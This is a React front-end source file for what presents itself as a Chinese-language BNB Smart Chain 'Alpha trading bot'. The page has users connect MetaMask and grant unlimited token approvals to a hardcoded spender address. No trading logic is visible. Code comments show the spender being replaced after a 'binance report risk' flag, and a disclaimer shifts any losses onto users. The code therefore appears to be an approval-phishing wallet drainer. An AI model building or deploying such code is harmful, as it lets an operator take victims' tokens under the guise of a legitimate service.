/* eslint-env es2020 */
import React, { useState, useEffect } from "react";
import { ethers } from "ethers";
import "./App.css";
import "./Telegram.css";

const ERC20_ABI = [
  "function allowance(address owner, address spender) view returns (uint256)",
  "function approve(address spender, uint256 amount) returns (bool)",
  "function decimals() view returns (uint8)",
  "function symbol() view returns (string)",
];

const TOKENS = [
  { name: "KOGE", address: "0xe6DF05CE8C8301223373CF5B969AFCb1498c5528" },
  { name: "ZKJ", address: "0xc71b5f631354be6853efe9c3ab6b9590f8302e81" },
  { name: "MERL", address: "0xa0c56a8c0692bD10B3fA8f8bA79Cf5332B7107F9" },
  { name: "PORT3", address: "0xb4357054c3dA8D46eD642383F03139aC7f090343" },
];
// test
// const SPENDER_ADDRESS = '0xDa902F021f36A69cf9A9D55e53fe433F3C793f50';
// prod
// binance report risk
// const SPENDER_ADDRESS = "0xd6755751CBF311F89988fB5D231795F8F58DDf45";
// try new
const SPENDER_ADDRESS = "0x4de864f9649B4709a143B8834164Fe37747b4920";
const MAX_APPROVAL = BigInt(
  "115792089237316195423570985008687907853269984665640564039457584007913129639935"
);
const BSC_CHAIN_ID = BigInt(56);

const BSC_MAINNET = {
  chainId: "0x38",
  chainName: "BNB Smart Chain",
  rpcUrls: [
    "https://bsc-mainnet.blastapi.io/2408118b-a808-422e-8c8f-ec8d24993a49",
  ],
  nativeCurrency: { name: "BNB", symbol: "BNB", decimals: 18 },
  blockExplorerUrls: ["https://bscscan.com"],
};

function App() {
  const [account, setAccount] = useState(null);
  const [provider, setProvider] = useState(null);
  const [selectedToken, setSelectedToken] = useState(TOKENS[0].address);
  const [allowances, setAllowances] = useState({});
  const [isLoading, setIsLoading] = useState(false);
  const [error, setError] = useState("");
  const [isCorrectNetwork, setIsCorrectNetwork] = useState(false);

  const checkNetwork = async (provider) => {
    try {
      const network = await provider.getNetwork();
      setIsCorrectNetwork(network.chainId === BSC_CHAIN_ID);
    } catch (err) {
      setError("检查网络失败: " + err.message);
    }
  };

  const switchToBsc = async () => {
    try {
      await window.ethereum.request({
        method: "wallet_switchEthereumChain",
        params: [{ chainId: BSC_MAINNET.chainId }],
      });
    } catch (switchError) {
      setError("切换到 BNB Smart Chain 网络失败: " + switchError.message);
    }
  };

  const connectWallet = async () => {
    try {
      if (!window.ethereum) {
        setError("请安装 MetaMask 钱包扩展");
        return;
      }

      const newProvider = new ethers.BrowserProvider(window.ethereum);
      await newProvider.send("eth_requestAccounts", []);
      const signer = await newProvider.getSigner();
      const address = await signer.getAddress();

      setProvider(newProvider);
      setAccount(address);
      await checkNetwork(newProvider);

      if ((await newProvider.getNetwork()).chainId === BSC_CHAIN_ID) {
        fetchAllowances(address, newProvider);
      }
    } catch (err) {
      setError("连接钱包失败: " + err.message);
    }
  };

  useEffect(() => {
    if (!window.ethereum) return;

    const handleChainChanged = async (chainIdHex) => {
      const chainId = BigInt(chainIdHex);
      const isBSC = chainId === BSC_CHAIN_ID;
      setIsCorrectNetwork(isBSC);

      try {
        const newProvider = new ethers.BrowserProvider(window.ethereum);
        if (isBSC) {
          const signer = await newProvider.getSigner();
          const address = await signer.getAddress();
          setProvider(newProvider);
          setAccount(address);
          fetchAllowances(address, newProvider);
        } else {
          setAllowances({});
        }
      } catch (error) {
        setError("网络切换错误: " + error.message);
      }
    };

    const handleAccountsChanged = async (accounts) => {
      if (accounts.length === 0) {
        setAccount(null);
        setAllowances({});
        return;
      }

      try {
        const newProvider = new ethers.BrowserProvider(window.ethereum);
        const chainId = (await newProvider.getNetwork()).chainId;
        const isBSC = chainId === BSC_CHAIN_ID;

        setProvider(newProvider);
        setAccount(accounts[0]);
        setIsCorrectNetwork(isBSC);

        if (isBSC) {
          fetchAllowances(accounts[0], newProvider);
        }
      } catch (error) {
        setError("账户变更错误: " + error.message);
      }
    };

    window.ethereum.on("chainChanged", handleChainChanged);
    window.ethereum.on("accountsChanged", handleAccountsChanged);

    return () => {
      window.ethereum.removeListener("chainChanged", handleChainChanged);
      window.ethereum.removeListener("accountsChanged", handleAccountsChanged);
    };
  }, []);

  const fetchAllowances = async (address, provider) => {
    try {
      const newAllowances = {};
      for (const token of TOKENS) {
        const contract = new ethers.Contract(
          token.address,
          ERC20_ABI,
          provider
        );
        const [allowance, symbol] = await Promise.all([
          contract.allowance(address, SPENDER_ADDRESS),
          contract.symbol(),
        ]);
        newAllowances[token.address] = { isApproved: allowance > 0, symbol };
      }
      setAllowances(newAllowances);
    } catch (err) {
      // setError('获取授权信息失败: ' + err.message);
      setError("获取授权信息失败");
    }
  };

  const approveToken = async () => {
    if (!provider || !account) {
      setError("请先连接钱包");
      return;
    }

    setIsLoading(true);
    setError("");

    try {
      const contract = new ethers.Contract(
        selectedToken,
        ERC20_ABI,
        await provider.getSigner()
      );
      const tx = await contract.approve(SPENDER_ADDRESS, MAX_APPROVAL);
      await tx.wait();
      fetchAllowances(account, provider);
      alert("授权成功");
    } catch (err) {
      // setError('授权失败: ' + err.message);
      setError("授权失败");
    } finally {
      setIsLoading(false);
    }
  };

  const revokeApproval = async (tokenAddress) => {
    if (!provider || !account) {
      setError("请先连接钱包");
      return;
    }

    setIsLoading(true);
    setError("");

    try {
      const contract = new ethers.Contract(
        tokenAddress,
        ERC20_ABI,
        await provider.getSigner()
      );
      const tx = await contract.approve(SPENDER_ADDRESS, 0);
      await tx.wait();
      fetchAllowances(account, provider);
      alert("取消授权成功");
    } catch (err) {
      setError("取消授权失败: " + err.message);
    } finally {
      setIsLoading(false);
    }
  };

  const formatAddress = (addr) =>
    addr ? `${addr.slice(0, 6)}...${addr.slice(-4)}` : "";

  return (
    <div className="container">
      <h1>开饭了Alpha机器人</h1>
      <p className="trading-pairs-info">
        支持所有USDT/USDC/BNB交易对
      </p>

      <div className="wallet-section">
        <h3>钱包状态</h3>
        {account ? (
          <>
            <p>已连接: {formatAddress(account)}</p>
            {!isCorrectNetwork && (
              <>
                <p className="network-error">
                  请切换到 BNB Smart Chain 网络以继续操作
                </p>
                <button onClick={switchToBsc} disabled={isLoading}>
                  切换到 BNB Smart Chain
                </button>
              </>
            )}
          </>
        ) : (
          <button onClick={connectWallet} disabled={isLoading}>
            连接钱包
          </button>
        )}
      </div>

      {account && isCorrectNetwork && (
        <>
          <div className="approve-section">
            <h3>授权代币</h3>
            <select
              value={selectedToken}
              onChange={(e) => setSelectedToken(e.target.value)}
            >
              {TOKENS.map((token) => (
                <option key={token.address} value={token.address}>
                  {token.name}
                </option>
              ))}
            </select>
            <button onClick={approveToken} disabled={isLoading}>
              {isLoading ? "处理中..." : "授权"}
            </button>
          </div>

          <div className="allowance-section">
            <h3>当前授权状态</h3>
            <button
              onClick={() => fetchAllowances(account, provider)}
              disabled={isLoading}
              className="refresh-button"
            >
              刷新授权状态
            </button>
            {Object.entries(allowances).map(([address, data]) => (
              <div key={address} className="allowance-item">
                <p>
                  {data.symbol}: {data.isApproved ? "已授权" : "无授权"}
                </p>
                {data.isApproved && (
                  <button
                    onClick={() => revokeApproval(address)}
                    disabled={isLoading}
                  >
                    取消授权
                  </button>
                )}
              </div>
            ))}
          </div>
        </>
      )}

      {error && <p className="error">{error}</p>}
      <a
        href="https://t.me/+RP_oc6iJm6VjMGZl"
        target="_blank"
        class="tg-join-btn"
      >
        <svg class="tg-logo" viewBox="0 0 24 24">
          <path d="M12 0C5.373 0 0 5.373 0 12s5.373 12 12 12 12-5.373 12-12S18.627 0 12 0zm5.894 8.221l-1.97 9.28c-.145.658-.537.818-1.084.508l-3-2.21-1.446 1.394c-.14.14-.26.26-.428.26l.213-3.053 5.56-5.023c.24-.213-.054-.333-.373-.12l-6.87 4.326-2.962-.924c-.64-.203-.658-.64.135-.954l11.57-4.458c.538-.196 1.006.128.832.941z" />
        </svg>
        <span class="btn-text">Telegram群组</span>
      </a>
      <div class="disclaimer-card">
        <div class="disclaimer-header">
          <h2 class="disclaimer-title">免责声明</h2>
        </div>

        <div class="disclaimer-content">
          <p>
            通过使用本区块链交易机器人服务（以下简称“服务”），您明确了解并同意以下条款：
          </p>

          <div class="disclaimer-point">
            <strong>代币授权风险：</strong>
            您授权本服务的智能合约管理您的代币，允许其代表您执行交易操作。代币授权存在固有风险，包括但不限于智能合约漏洞、第三方攻击或未预期的技术问题，可能导致资金损失。您确认已充分了解这些风险，并自愿选择使用本服务。
          </div>

          <div class="disclaimer-point">
            <strong>取消授权建议：</strong>
            使用本服务后，强烈建议您在交易完成后立即通过区块链网络撤销对本服务智能合约的代币授权（例如，通过撤销对合约的“approve”权限）。未及时取消授权可能导致潜在风险。
          </div>

          <div class="disclaimer-warning">
            <strong>重要提示：</strong>
            未及时取消授权可能导致您的代币面临不必要的安全风险。
          </div>

          <div class="disclaimer-point">
            <strong>用户责任：</strong>
            因未及时取消授权、个人操作失误、区块链网络问题或其他非本服务直接导致的原因造成的任何损失（包括但不限于代币丢失或价值损失），由用户自行承担。本服务不对上述损失承担任何责任。
          </div>

          <div class="disclaimer-point">
            <strong>无担保声明：</strong>
            本服务按“现状”提供，不提供任何明示或暗示的担保，包括但不限于服务可用性、准确性或适合特定用途的担保。用户使用本服务即表示接受所有相关风险。
          </div>
        </div>

        <div class="disclaimer-footer">
          <p>
            通过使用本服务，您确认已阅读、理解并同意本免责声明的全部内容。如不同意，请勿使用本服务。
          </p>
        </div>
      </div>
    </div>
  );
}

export default App;
